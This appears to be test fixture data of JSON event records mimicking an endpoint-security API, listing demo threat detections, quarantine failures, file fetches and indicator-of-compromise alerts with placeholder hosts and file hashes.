-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} 